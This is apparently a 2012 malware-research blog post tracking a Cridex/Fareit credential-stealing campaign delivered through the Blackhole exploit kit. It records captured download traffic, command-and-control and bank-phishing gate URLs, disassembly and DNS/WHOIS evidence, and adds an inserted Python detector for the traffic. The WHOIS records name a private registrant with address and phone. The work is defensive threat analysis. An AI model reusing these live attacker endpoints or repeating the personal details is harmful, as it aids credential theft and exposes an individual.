Saturday, December 22, 2012

The Crime Still Goes On: Trojan Fareit Credential Stealer - New Server, Same Group, Same Game (via BHEK/Cridex)

As posted A WEEK AGO here -->>[Prev.Post], that crime group STILL infects victims.
The infector concept and the way the binary works are exactly the same as in the previous case.

Infection Source Summary & Trojan Communication Info

Spam infector:
URL: h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm
Server: Apache, WordPress
IP: 50.116.98.44
Blackhole:
Landing: h00p://latticesoft.net/detects/continues-little.php
Server: nginx/1.3.3
Date: Fri, 21 Dec 2012 18:44:29 GMT
Content-Type: text/html
X-Powered-By: PHP/5.3.14
IP: 59.57.247.185
Trojan Cridex (payload) download URL:
h00p://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d
Trojan Fareit Download Source:
*) All proxies answer on port 8080 with Server: nginx/1.0.10
PoC of the Trojan Fareit stealer download, as in the example below:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 94.73.129.120:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
...?f/.....0N}a.9.Je...U;0..
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 22 Dec 2012 08:29:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Trojan Fareit callback IPs:
CNC is 62.76.177.51, PoC:
// Credentials are sent to the CnC panel
var adminPanelLocation = 'h00p://62.76.177.51/if_Career/';

// Data modify process:
h00p://62.76.177.123/mx/2B/in/cp.php?h=8

// Phishing credential URLs
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargo
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamerica
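A defender-side detection helper, added here as an example (it is not the author's code and not from the original post): it parses raw HTTP messages like the PoC above and flags the download POST to the nginx/1.0.10 proxies on port 8080, the proxy response fingerprint, the /asp/intro.php callback and the gate.php?botid=...&bank=... check-in. The three-segment path regex and the sample traffic are my assumptions modelled on the capture, not real PCAP data.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constants copied from the traffic captured in this post.
FAREIT_UA = "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
PROXY_SERVER = "nginx/1.0.10"
# Assumed shape of the download path: three opaque alphanumeric segments.
DOWNLOAD_PATH = re.compile(r"^/[A-Za-z0-9]{6,12}/[A-Za-z0-9]{6,12}/[A-Za-z0-9]{6,12}/$")
CALLBACK_PATH = "/asp/intro.php"
GATE_PATH = "/if_Ipckg/gate.php"

def parse_message(raw):
    """Split a raw HTTP message into (start line, headers with lower-cased names, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def classify_request(raw):
    """Return the Fareit/Cridex indicators a request matches (empty list = nothing seen)."""
    start, headers, _body = parse_message(raw)
    method, target, _version = start.split(" ", 2)
    host = headers.get("host", "")
    port = host.rsplit(":", 1)[1] if ":" in host else "80"
    url = urlsplit(target)
    hits = []
    if method == "POST" and port == "8080" and DOWNLOAD_PATH.match(url.path):
        hits.append("fareit-download-post")
    if headers.get("user-agent") == FAREIT_UA:
        hits.append("fareit-user-agent")
    if url.path == CALLBACK_PATH and port == "8080":
        hits.append("fareit-callback")
    if url.path == GATE_PATH:
        query = parse_qs(url.query)
        if "botid" in query and "bank" in query:
            hits.append("fareit-gate-" + query["bank"][0])
    return hits

def is_fareit_proxy_response(raw):
    """True when the response carries the proxy fingerprint seen in the capture."""
    _start, headers, _body = parse_message(raw)
    return headers.get("server") == PROXY_SERVER and headers.get("x-powered-by", "").startswith("PHP/5.3.18")

# Constructed sample traffic modelled on the capture above (not real PCAP data).
DOWNLOAD_REQ = ("POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1\r\nAccept: */*\r\nUser-Agent: " + FAREIT_UA
                + "\r\nHost: 94.73.129.120:8080\r\nConnection: Keep-Alive\r\n\r\n\x00?f/\x01")
GATE_REQ = "GET /if_Ipckg/gate.php?botid=RIK-TEST_0000&bank=chase HTTP/1.1\r\nHost: 62.76.177.51\r\n\r\n"
BENIGN_REQ = "POST /api/v1/login/ HTTP/1.1\r\nHost: example.com:8080\r\nUser-Agent: curl/7.68.0\r\n\r\nuser=a"
PROXY_RESP = "HTTP/1.1 200 OK\r\nServer: nginx/1.0.10\r\nX-Powered-By: PHP/5.3.18-1~dotdeb.0\r\n\r\n"

if __name__ == "__main__":
    print(classify_request(DOWNLOAD_REQ), classify_request(GATE_REQ), classify_request(BENIGN_REQ), is_fareit_proxy_response(PROXY_RESP))
```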
CnC passwords (reversed from Trojan Fareit):

Analysis Summary & Research Materials

This time I dumped every memory region of Trojan Fareit to txt here -->>[PASTEBIN] ↑ so you can see which FTP, file and POP/SMTP credential data was leaked and grabbed, as evidence of this evil stealer crime. Additionally, see the Fareit Trojan's config here -->>[PASTEBIN] ↑ where you can confirm the targeted online banks' info and the phishing HTML code these actors used. There are slight BHEK changes in the PluginDetect obfuscated code (landing page); I cracked it manually and wrote GUIDANCE to decode it here -->>[PASTEBIN]. PluginDetect before -->>[PASTEBIN] & after decoding -->>[PASTEBIN]. Payload binary static & dynamic analysis text (a quicky) -->>[PASTEBIN]. Sample download is here -->>[MEDIAFIRE]. Captured data is here (PCAP, RegShot, MEMShot, etc.) -->>[MEDIAFIRE]

Account Phishing Act by current version Trojan

Hello Citi Account Online! Same as previous: Chase Bank! This time BANK OF AMERICA!!!

PoC of all possible Email Credentials Also Grabbed

In the previous case, I got strong requests to check not only HTTP/FTP/server logins but also e-mail credentials. Here we go:

Virus Total Detection Ratio

Landing Page: (3/45) ---->>[VirusTotal]
Trojan Cridex Downloader: (15/44) ---->>[VirusTotal]
Trojan Fareit Credential Stealer: (4/45) ---->>[VirusTotal]

PoC / Analysis ScreenShots

Malware processes: payload after self-copying (dropping) into %AppData%\
Network HTTP traffic captured:
Need to fix the binary before reversing it properly...
// Very annoying anti-reverse....
   :         :                           :
0x00003cf2 (01) 47                     INC EDI
0x00003cf3 (01) 5c                     POP ESP
0x00003cf4 (05) a9 2835b437            TEST EAX, 0x37b43528
0x00003cf9 (03) 0ff2f8                 PSLLD MM7, MM0
0x00003cfc (01) 4b                     DEC EBX
0x00003cfd (01) 95                     XCHG EBP, EAX
0x00003cfe (02) b2 f9                  MOV DL, 0xf9
0x00003d00 (01) ef                     OUT DX, EAX
0x00003d01 (01) 51                     PUSH ECX
0x00003d02 (01) ac                     LODSB
0x00003d03 (01) 46                     INC ESI
0x00003d04 (02) 71 77                  JNO 0x00003d7d   ; 1
0x00003d04 --------------------------------------------------
0x00003d06 (02) 72 71                  JB 0x00003d79    ; 2
0x00003d06 --------------------------------------------------
0x00003d08 (02) 77 72                  JA 0x00003d7c    ; 3
0x00003d08 --------------------------------------------------
0x00003d0a (02) 71 77                  JNO 0x00003d83   ; 4
0x00003d0a --------------------------------------------------
0x00003d0c (02) 72 71                  JB 0x00003d7f    ; 5
  :          :    :                     :    :     :
3CE8   50 44 44 33 D7 24 91 FF 62 27 47 5C A9 28 35 B4    PDD3.$..b'G..(5.
3CF8   37 0F F2 F8 4B 95 B2 F9 EF 51 AC 46 71 77 72 71    7...K....Q.Fqwrq
3D08   77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77    wrqwrqwrqwrqwrqw // This qwrqwr :-(((
3D18   72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72    rqwrqwrqwrqwrqwr
3D28   71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71    qwrqwrqwrqwrqwrq
3D38   77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77    wrqwrqwrqwrqwrqw
3D48   72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72    rqwrqwrqwrqwrqwr
3D58   71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71    qwrqwrqwrqwrqwrq
  :                             :                            :

PoC of the same group as previous case

Seriously, it uses the same NS server, registered by the same person..
// latticesoft.net < dns search  

;; QUESTION SECTION:
;latticesoft.net.               IN      ANY

;; ANSWER SECTION:
latticesoft.net.        900     IN      A       59.57.247.185
latticesoft.net.        900     IN      SOA     ns1.amishshoppe.net. . 1356192301 60 120 1048576 900
latticesoft.net.        900     IN      NS      ns2.amishshoppe.net.
latticesoft.net.        900     IN      NS      ns1.amishshoppe.net.

;; AUTHORITY SECTION:
latticesoft.net.        900     IN      NS      ns2.amishshoppe.net.
latticesoft.net.        900     IN      NS      ns1.amishshoppe.net.

;; ADDITIONAL SECTION:
ns1.amishshoppe.net.    3600    IN      A       209.140.18.37
ns2.amishshoppe.net.    3600    IN      A       211.27.42.138

// PoC that the infector domain is currently in service (delegation trace from the root servers):

// Historical/pDNS-related IP-domain info:
eaglepointecondo.org  A  59.57.247.185
latticesoft.net       A  59.57.247.185
eaglepointecondo.biz  A  59.57.247.185
sessionid0147239047829578349578239077.pl A  59.57.247.185

// Check AXFR (see whether anyone can pull or change the records via a secondary DNS; the transfer is refused, so the zone is not exposed)
]$ nslookup
> set type=axfr
> amishshoppe.net
; Transfer failed.
Server:         8.8.8.8
Address:        8.8.8.8#53

// WHOIS Database of DNS Service Domain....

Domain Name: AMISHSHOPPE.NET
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Name Server: NS1.AMISHSHOPPE.NET
Name Server: NS2.AMISHSHOPPE.NET
Status: clientTransferProhibited
Updated Date: 15-nov-2012
Creation Date: 15-nov-2012
Expiration Date: 15-nov-2013

// Registrant Database Checks...
Registrant:

   Steve Burandt
   0n430 Peter Rd
   Winfield, IL 60190
   US
   Phone: +1.6304626711
   Email: solaradvent@yahoo.com

Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com

Domain Name: amishshoppe.net
   Created on..............: 2012-11-15
   Expires on..............: 2013-11-15

Administrative Contact:
   Steve Burandt
   0n430 Peter Rd
   Winfield, IL 60190
   US
   Phone: +1.6304626711
   Email: solaradvent@yahoo.com

Technical Contact:
   Registercom
   Domain Registrar
   12808 Gran Bay Pkwy
   West Jacksonville, FL 32258
   US
   Phone: +1.9027492701
   Email: domainregistrar@register.com

DNS Servers:
   ns2.amishshoppe.net
   ns1.amishshoppe.net

#MalwareMustDie

3 comments:

  1. Connection: Keep-Alive
    Cache-Control: no-cache
    ...?f/.....0N}a.9.Je...U;0..
    :

    /key to disabling, no? shows a recursive call with a hash following command Cache-Control: no-cache.../

  2. I think you were referring to when Cridex called the Fareit server to download the packet parts.
    Let's see the whole PCAP packet data to be precise; this is the download path: http://www.mediafire.com/?k3uljvwj9kk4wnz
    When the first incoming packet had almost stopped, the %temp% data chunks were shown; when it 100% stopped, the exe was found in %temp%, and at the same time the registry's long binary textual data also came into view. Kind of afraid of making mistakes, so I ran it 4 (four) times myself to be sure about the sequence of this part.

  3. The show still goes on..

    New IP/domains:
    91.224.135.20, 187.85.160.106, 82.165.193.26:
    belnialamsik.ru
    demoralization.ru
    bananamamor.ru
    Evidence: http://pastebin.com/raw.php?i=TUKqDU3N
